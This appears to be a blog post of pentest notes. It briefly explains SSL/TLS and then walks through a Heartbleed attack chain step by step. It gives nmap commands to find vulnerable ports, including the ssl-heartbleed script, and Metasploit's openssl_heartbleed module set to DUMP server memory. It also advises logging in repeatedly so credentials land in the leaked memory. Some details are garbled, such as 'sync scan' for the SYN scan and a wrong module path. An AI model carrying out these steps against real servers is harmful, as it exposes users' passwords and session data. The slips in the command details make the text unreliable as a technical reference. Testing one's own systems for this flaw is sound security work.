Heartbleed Attack

on
  1. Heartbleed Attack: -
    1. OpenSSL is a software library that implements the SSL (secure sockets layer) and TLS (transport layer security) web security protocols.
    2. SSL and TLS are methods for using cryptography to secure communication between two parties. Although there are some important differences at a technical level (and SSL has largely been made obsolete in favor of the more secure TLS), they both work essentially the same way. (In fact, many people simply refer to both protocols as “SSL.”)
      1. Once a connection is made between a client and server, the client requests a secure connection. It requests information about what types of cryptographic security the client supports.
      2. The server chooses the most secure option that both the server and client support, and then sends a security certificate signed with the server’s public key.
      3. The client verifies the certificate and generates a secret key to send to the server, encrypted with the server’s public key.
      4. The client and server use the secret key to generate a pair of symmetric keys (or two pairs of public-private keys), and communication commences securely.
    3. Attack chain: -
    1. Attack surface: -
      1. We can always check SSL or HTTPS ports, scan with the help of nmap.
        1. nmap -sS <<target ip address>> -p<<port number>> -sV
          1. nmap  = tool name
          2. -sS = sync scan
          3. <<ip address>> = eg: - 10.10.10.10
          4. <<port number>> = 443, 4443 etc.
          5. -sV  = for service and version running
        2. Nmap -sS <<target ip address>> -p<<port number>> --script ssl-heartbleed
          1. --script = to use nse scripts.
          2. ssl-heartbleed = one of the scripts from nse. Multiple scripts are available. With this we will be able to find out whether it is vulnerable or not.
        3. If it is vulnerable then, use metasploit ( multiple tools are there but metasploit is most easiest).
          1. msfconsole -q (to run metasploit in kali, -q is quite mode)
          2. Use auxiliary/scanner/ssl/openssl/openssl_heartbleed
            1. show actions - 3 options - DUMP, KEYS, SCAN will be visible.
            2. set action DUMP - to dump/save the memory data.
            3. Show options: -
              1. Set rhost and rport and other things required if any.
            4. Before going forward, make sure you have logged in the application multiple times with all possible users.
            5. run  in the metasploit. File will be saved.
            6. Check the file for sensitive details we received.

Comments

Post a Comment